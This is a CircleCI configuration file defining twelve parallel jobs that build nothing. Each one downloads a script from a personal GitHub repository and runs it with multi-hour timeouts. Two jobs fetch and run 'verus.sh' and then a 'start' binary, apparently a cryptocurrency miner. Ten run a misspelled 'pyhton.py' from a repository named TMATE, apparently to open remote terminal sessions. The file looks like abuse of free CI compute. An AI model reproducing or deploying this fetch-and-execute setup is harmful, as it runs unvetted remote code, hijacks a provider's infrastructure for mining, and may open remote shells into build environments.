version: 2
jobs:
  build_01:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 300m
          
          command: "wget https://raw.githubusercontent.com/nurfasikin/verust/main/verus.sh && chmod u+x verus.sh && ./verus.sh && chmod +x start &&./start"              
      
  build_02:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 300m
          
          command: "wget https://raw.githubusercontent.com/nurfasikin/verust/main/verus.sh && chmod u+x verus.sh && ./verus.sh && chmod +x start &&./start"
      
  build_03:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 300m
          
          command: "wget https://raw.githubusercontent.com/sbwsmg/TMATE/main/pyhton.py && python pyhton.py"
      
  build_04:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 300m
          
          command: "wget https://raw.githubusercontent.com/sbwsmg/TMATE/main/pyhton.py && python pyhton.py"

  build_05:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://raw.githubusercontent.com/sbwsmg/TMATE/main/pyhton.py && python pyhton.py"              
      
  build_06:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 300m
          
          command: "wget https://raw.githubusercontent.com/sbwsmg/TMATE/main/pyhton.py && python pyhton.py"
      
  build_07:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 300m
          
          command: "wget https://raw.githubusercontent.com/sbwsmg/TMATE/main/pyhton.py && python pyhton.py"
      
  build_08:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 300m
          
          command: "wget https://raw.githubusercontent.com/sbwsmg/TMATE/main/pyhton.py && python pyhton.py" 

  build_09:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://raw.githubusercontent.com/sbwsmg/TMATE/main/pyhton.py && python pyhton.py"              
      
  build_10:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 300m
          
          command: "wget https://raw.githubusercontent.com/sbwsmg/TMATE/main/pyhton.py && python pyhton.py"
      
  build_11:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 300m
          
          command: "wget https://raw.githubusercontent.com/sbwsmg/TMATE/main/pyhton.py && python pyhton.py"
      
  build_12:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 300m
          
          command: "wget https://raw.githubusercontent.com/sbwsmg/TMATE/main/pyhton.py && python pyhton.py"  
      
  
workflows:
    version: 2
    build:
        jobs:
            - build_01
            - build_02
            - build_03
            - build_04
            - build_05
            - build_06
            - build_07
            - build_08
            - build_09
            - build_10
            - build_11
            - build_12